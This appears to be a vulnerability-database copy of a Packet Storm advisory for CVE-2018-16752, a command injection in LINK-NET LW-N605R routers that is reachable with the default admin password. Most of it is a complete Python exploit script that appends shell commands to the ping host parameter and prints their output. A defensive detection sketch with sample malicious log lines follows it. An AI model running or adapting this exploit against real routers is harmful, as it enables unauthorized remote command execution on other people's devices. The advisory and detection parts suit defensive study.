LW-N605R Remote Code Execution

Published: 10 Sep 2018 00:00:00
Reported by: Nassim Asrir
Type: packetstorm
Source: packetstormsecurity.com

LW-N605R devices allow remote code execution via shell metacharacters in the HOST field of the ping feature at adm/systools.asp. Authentication is needed, but the default admin password may be used.

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| CNVD | LW-N605R Remote Code Execution Vulnerability | 12 Sep 2018 00:00 | cnvd |
| CVE | CVE-2018-16752 | 20 Sep 2018 20:00 | cve |
| Cvelist | CVE-2018-16752 | 20 Sep 2018 20:00 | cvelist |
| NVD | CVE-2018-16752 | 20 Sep 2018 20:29 | nvd |
| Prion | Default credentials | 20 Sep 2018 20:29 | prion |
| VulnCheck KEV | VulnCheck KEV: CVE-2018-16752 | 3 Jan 2024 00:00 | vulncheck_kev |

Code

```python
'''
# Title: LW-N605R - Remote Code Execution

# Author: Nassim Asrir

# Contact: [email protected] | https://www.linkedin.com/in/nassim-asrir-b73a57122/

# Vendor: LINK-NET

# Description: LW-N605R devices allow Remote Code Execution via shell metacharacters in the HOST field of the ping feature at adm/systools.asp.
Authentication is needed but the default password of admin for the admin account may be used in some cases.

# CVE: CVE-2018-16752

# Example:

┌─[root@parrot]─[/home/sniperpex/Desktop]
└──╼ #python ./blue.py -t http://host/ -c ls -u admin -p admin


_ __ __ _ _ __ ___ ____ ____ _____ _ _ _
| |\ \ / / | \ | |/ /_ / _ \| ___|| _ \ | ____|_ ___ __ | | ___ (_) |_
| | \ \ /\ / /____| \| | '_ \| | | |___ \| |_) | | _| \ \/ / '_ \| |/ _ \| | __|
| |__\ V V /_____| |\ | (_) | |_| |___) | _ < | |___ > <| |_) | | (_) | | |_
|_____\_/\_/ |_| \_|\___/ \___/|____/|_| \_\ |_____/_/\_\ .__/|_|\___/|_|\__|
|_|
@AsrirNassim



[+] Connection in progress...
[+] Authentication in progress...
[+] Username & Password: OK
[+] Checking for vulnerability...
[!] Command "ls": was executed!

var
usr
tmp
sys
sbin
proc
mnt
media
lib
init
home
etc_ro
etc
dev
bin
'''
import urllib2
import base64
import optparse
import sys
import bs4

banner = """

_ __ __ _ _ __ ___ ____ ____ _____ _ _ _
| |\ \ / / | \ | |/ /_ / _ \| ___|| _ \ | ____|_ ___ __ | | ___ (_) |_
| | \ \ /\ / /____| \| | '_ \| | | |___ \| |_) | | _| \ \/ / '_ \| |/ _ \| | __|
| |__\ V V /_____| |\ | (_) | |_| |___) | _ < | |___ > <| |_) | | (_) | | |_
|_____\_/\_/ |_| \_|\___/ \___/|____/|_| \_\ |_____/_/\_\ .__/|_|\___/|_|\__|
|_|
@AsrirNassim


"""

# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    else:
        return url+"/goform/sysTools"

def connectionScan(url,user,pwd,cmd):
    print '[+] Connection in progress...'
    try:
        response = urllib2.Request(url)
        content = urllib2.urlopen(response)
        print '[X] LW-N605R Authentication not found'
    except urllib2.HTTPError, e:
        if e.code == 404:
            print '[X] Page not found'
        elif e.code == 401:
            try:
                print '[+] Authentication in progress...'
                base64string = base64.encodestring('%s:%s' % (user, pwd)).replace('\n', '')
                response = urllib2.Request(url+"/goform/sysTools?tool=0&pingCount=4&host=127.0.0.1;"+cmd+"&sumbit=OK", None)
                response.add_header("Authorization", "Basic %s" % base64string)
                content = urllib2.urlopen(response).read()
                if "putmsg(mPingCount);" in content:
                    print '[+] Username & Password: OK'
                    print '[+] Checking for vulnerability...'
                    if 'e' in content:
                        print '[!] Command "'+cmd+'": was executed!'
                    else:
                        print '[X] Not Vulnerable :('
                else:
                    print '[X] No LW-N605R page found'
                soup = bs4.BeautifulSoup(content, 'html.parser')

                for textarea in soup.find_all('textarea'):
                    print textarea.get_text()
            except urllib2.HTTPError, e:
                if e.code == 401:
                    print '[X] Wrong username or password'
                else:
                    print '[X] HTTP Error: '+str(e.code)
            except urllib2.URLError:
                print '[X] Connection Error'
        else:
            print '[X] HTTP Error: '+str(e.code)
    except urllib2.URLError:
        print '[X] Connection Error'

commandList = optparse.OptionParser('usage: %prog -t https://target:444/ -u admin -p pwd -c "ls"')
commandList.add_option('-t', '--target', action="store",
                       help="Insert TARGET URL",
                       )
commandList.add_option('-c', '--cmd', action="store",
                       help="Insert command name",
                       )
commandList.add_option('-u', '--user', action="store",
                       help="Insert username",
                       )
commandList.add_option('-p', '--pwd', action="store",
                       help="Insert password",
                       )
options, remainder = commandList.parse_args()

# Check args
if not options.target or not options.cmd or not options.user or not options.pwd:
    print(banner)
    commandList.print_help()
    sys.exit(1)

print(banner)

url = checkurl(options.target)
cmd = options.cmd
user = options.user
pwd = options.pwd

connectionScan(url,user,pwd,cmd)
```
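
For defenders, the request shape above gives a simple detection: any `/goform/sysTools` request whose `host` parameter is not a plain IP address or hostname. The following Python 3 sketch is an added example, not part of the original advisory or the vendor's code; the function names, the Common Log Format layout and the sample log lines are assumptions constructed for illustration. The same allowlist is what a corrected ping handler would enforce before invoking `ping`.

```python
import ipaddress
import re
from urllib.parse import unquote_plus

# RFC 1123 hostname label: letters, digits, inner hyphens, 1-63 characters.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")
# Assumed Common Log Format: client ... "METHOD target HTTP/x.y" status size
_REQUEST = re.compile(r'(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def is_valid_ping_host(value):
    """Allowlist check: True only for a literal IP address or a hostname."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    if not value or len(value) > 253:
        return False
    return all(_LABEL.fullmatch(label) for label in value.split("."))

def suspicious_systools_requests(log_lines):
    """Return (client, host) pairs for sysTools requests with a non-host value."""
    hits = []
    for line in log_lines:
        m = _REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        path, _, query = target.partition("?")
        if "/goform/sysTools" not in path:
            continue
        # Split on '&' only, so a ';' stays inside the value being inspected.
        for pair in query.split("&"):
            key, _, raw = pair.partition("=")
            # Percent-decode first so encoded metacharacters are judged as well.
            if unquote_plus(key) == "host" and not is_valid_ping_host(unquote_plus(raw)):
                hits.append((client, unquote_plus(raw)))
    return hits

# Constructed sample log lines (documentation address ranges, not captured traffic).
SAMPLE_LOG = [
    '192.0.2.10 - admin [10/Sep/2018:10:00:01 +0000] "GET /goform/sysTools?tool=0&pingCount=4&host=192.168.1.1&sumbit=OK HTTP/1.1" 200 512',
    '198.51.100.7 - admin [10/Sep/2018:10:02:13 +0000] "GET /goform/sysTools?tool=0&pingCount=4&host=127.0.0.1;ls&sumbit=OK HTTP/1.1" 200 734',
    '198.51.100.7 - admin [10/Sep/2018:10:02:40 +0000] "GET /goform/sysTools?tool=0&pingCount=4&host=127.0.0.1%3Bls&sumbit=OK HTTP/1.1" 200 734',
    '192.0.2.10 - admin [10/Sep/2018:10:05:00 +0000] "GET /adm/systools.asp HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for client, host in suspicious_systools_requests(SAMPLE_LOG):
        print("ALERT %s host=%r" % (client, host))
```

Validating against what a host may look like, rather than blocklisting individual metacharacters, also covers separators such as newlines, pipes and backticks without having to enumerate them.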
